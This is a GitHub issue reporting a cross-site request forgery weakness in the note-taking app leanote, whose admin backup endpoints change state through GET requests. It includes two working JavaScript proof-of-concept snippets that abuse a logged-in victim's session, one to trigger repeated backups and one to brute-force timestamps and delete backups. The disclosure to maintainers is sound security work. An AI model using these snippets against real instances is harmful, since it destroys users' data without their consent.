New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Use GET method to modify things which may cause CSRF attack. #692

Closed
cissoid opened this Issue Nov 24, 2017 · 0 comments

Comments

Projects
None yet
1 participant
@cissoid

cissoid commented Nov 24, 2017

All these javascript functions could be executed in any website. There's all I need to do these attacks: 1) I know your custom domain (if you deploy leanote yourself); 2) You are logged in your leanote website.

For example, let's try to auto backup once per second:

function backup() {
    $.ajax({
        url: "https://your.custom.domain/adminData/backup",
        crossDomain: true,
        xhrFields: {withCredentials: true}
    });
    setTimeout(backup, 1000);
}
backup();

Maybe the backup operation is "safe" because there's no data lost, but delete backups is also feasible, because the only parameter needed is timestamp, which is easy to crack using brute force.

// DON'T TRY!!! THIS MAY DELETE YOUR DATA!!!
var timestamp = parseInt(new Date().getTime() / 1000);
function tryDelete() {
    $.ajax({
        url: "https://your.custom.domain/adminData/delete?createdTime=" + timestamp,
        crossDomain: true,
        xhrFields: {withCredentials: true}
    });
    timestamp--;
    setTimeout(tryDelete, 1000);
}

There's some more interfaces which modify things by GET:
https://github.com/leanote/leanote/search?p=1&q=ajaxGet&type=Code&utf8=%E2%9C%93

@cissoid cissoid closed this Apr 17, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment